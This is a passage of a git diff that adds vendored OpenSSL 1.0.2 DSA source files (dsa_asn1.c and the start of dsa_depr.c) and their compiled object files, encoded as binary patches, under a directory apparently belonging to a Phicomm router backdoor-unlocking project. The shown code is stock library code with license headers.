+};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_ameth.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_ameth.o
new file mode 100644
index 0000000000000000000000000000000000000000..047a3ecb24aa98b8eb8f1ea13b65200ad8ad76ba
GIT binary patch
literal 14928
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
bK{=M3_M1m#Gu1zghhj=k*{9smS^s|k#=%KY

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_asn1.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_asn1.c
new file mode 100644
index 0000000..3283a22
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_asn1.c
@@ -0,0 +1,202 @@
+/* dsa_asn1.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/dsa.h>
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include <openssl/rand.h>
+
+/* Override the default new methods */
+static int sig_cb(int operation, ASN1_VALUE **pval, const ASN1_ITEM *it,
+                  void *exarg)
+{
+    if (operation == ASN1_OP_NEW_PRE) {
+        DSA_SIG *sig;
+        sig = OPENSSL_malloc(sizeof(DSA_SIG));
+        if (!sig) {
+            DSAerr(DSA_F_SIG_CB, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+        sig->r = NULL;
+        sig->s = NULL;
+        *pval = (ASN1_VALUE *)sig;
+        return 2;
+    }
+    return 1;
+}
+
+ASN1_SEQUENCE_cb(DSA_SIG, sig_cb) = {
+        ASN1_SIMPLE(DSA_SIG, r, CBIGNUM),
+        ASN1_SIMPLE(DSA_SIG, s, CBIGNUM)
+} ASN1_SEQUENCE_END_cb(DSA_SIG, DSA_SIG)
+
+IMPLEMENT_ASN1_ENCODE_FUNCTIONS_const_fname(DSA_SIG, DSA_SIG, DSA_SIG)
+
+/* Override the default free and new methods */
+static int dsa_cb(int operation, ASN1_VALUE **pval, const ASN1_ITEM *it,
+                  void *exarg)
+{
+    if (operation == ASN1_OP_NEW_PRE) {
+        *pval = (ASN1_VALUE *)DSA_new();
+        if (*pval)
+            return 2;
+        return 0;
+    } else if (operation == ASN1_OP_FREE_PRE) {
+        DSA_free((DSA *)*pval);
+        *pval = NULL;
+        return 2;
+    }
+    return 1;
+}
+
+ASN1_SEQUENCE_cb(DSAPrivateKey, dsa_cb) = {
+        ASN1_SIMPLE(DSA, version, LONG),
+        ASN1_SIMPLE(DSA, p, BIGNUM),
+        ASN1_SIMPLE(DSA, q, BIGNUM),
+        ASN1_SIMPLE(DSA, g, BIGNUM),
+        ASN1_SIMPLE(DSA, pub_key, BIGNUM),
+        ASN1_SIMPLE(DSA, priv_key, BIGNUM)
+} ASN1_SEQUENCE_END_cb(DSA, DSAPrivateKey)
+
+IMPLEMENT_ASN1_ENCODE_FUNCTIONS_const_fname(DSA, DSAPrivateKey, DSAPrivateKey)
+
+ASN1_SEQUENCE_cb(DSAparams, dsa_cb) = {
+        ASN1_SIMPLE(DSA, p, BIGNUM),
+        ASN1_SIMPLE(DSA, q, BIGNUM),
+        ASN1_SIMPLE(DSA, g, BIGNUM),
+} ASN1_SEQUENCE_END_cb(DSA, DSAparams)
+
+IMPLEMENT_ASN1_ENCODE_FUNCTIONS_const_fname(DSA, DSAparams, DSAparams)
+
+/*
+ * DSA public key is a bit trickier... its effectively a CHOICE type decided
+ * by a field called write_params which can either write out just the public
+ * key as an INTEGER or the parameters and public key in a SEQUENCE
+ */
+
+ASN1_SEQUENCE(dsa_pub_internal) = {
+        ASN1_SIMPLE(DSA, pub_key, BIGNUM),
+        ASN1_SIMPLE(DSA, p, BIGNUM),
+        ASN1_SIMPLE(DSA, q, BIGNUM),
+        ASN1_SIMPLE(DSA, g, BIGNUM)
+} ASN1_SEQUENCE_END_name(DSA, dsa_pub_internal)
+
+ASN1_CHOICE_cb(DSAPublicKey, dsa_cb) = {
+        ASN1_SIMPLE(DSA, pub_key, BIGNUM),
+        ASN1_EX_COMBINE(0, 0, dsa_pub_internal)
+} ASN1_CHOICE_END_cb(DSA, DSAPublicKey, write_params)
+
+IMPLEMENT_ASN1_ENCODE_FUNCTIONS_const_fname(DSA, DSAPublicKey, DSAPublicKey)
+
+DSA *DSAparams_dup(DSA *dsa)
+{
+    return ASN1_item_dup(ASN1_ITEM_rptr(DSAparams), dsa);
+}
+
+int DSA_sign(int type, const unsigned char *dgst, int dlen,
+             unsigned char *sig, unsigned int *siglen, DSA *dsa)
+{
+    DSA_SIG *s;
+    RAND_seed(dgst, dlen);
+    s = DSA_do_sign(dgst, dlen, dsa);
+    if (s == NULL) {
+        *siglen = 0;
+        return (0);
+    }
+    *siglen = i2d_DSA_SIG(s, &sig);
+    DSA_SIG_free(s);
+    return (1);
+}
+
+/* data has already been hashed (probably with SHA or SHA-1). */
+/*-
+ * returns
+ *      1: correct signature
+ *      0: incorrect signature
+ *     -1: error
+ */
+int DSA_verify(int type, const unsigned char *dgst, int dgst_len,
+               const unsigned char *sigbuf, int siglen, DSA *dsa)
+{
+    DSA_SIG *s;
+    const unsigned char *p = sigbuf;
+    unsigned char *der = NULL;
+    int derlen = -1;
+    int ret = -1;
+
+    s = DSA_SIG_new();
+    if (s == NULL)
+        return (ret);
+    if (d2i_DSA_SIG(&s, &p, siglen) == NULL)
+        goto err;
+    /* Ensure signature uses DER and doesn't have trailing garbage */
+    derlen = i2d_DSA_SIG(s, &der);
+    if (derlen != siglen || memcmp(sigbuf, der, derlen))
+        goto err;
+    ret = DSA_do_verify(dgst, dgst_len, s, dsa);
+ err:
+    if (derlen > 0) {
+        OPENSSL_cleanse(der, derlen);
+        OPENSSL_free(der);
+    }
+    DSA_SIG_free(s);
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_asn1.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_asn1.o
new file mode 100644
index 0000000000000000000000000000000000000000..fe33dfa4fad8bf582f06312b03cff169e116db71
GIT binary patch
literal 8448
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_depr.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_depr.c
new file mode 100644
index 0000000..54f88bc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_depr.c
@@ -0,0 +1,113 @@
+/* crypto/dsa/dsa_depr.c */
+/* ====================================================================
+ * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
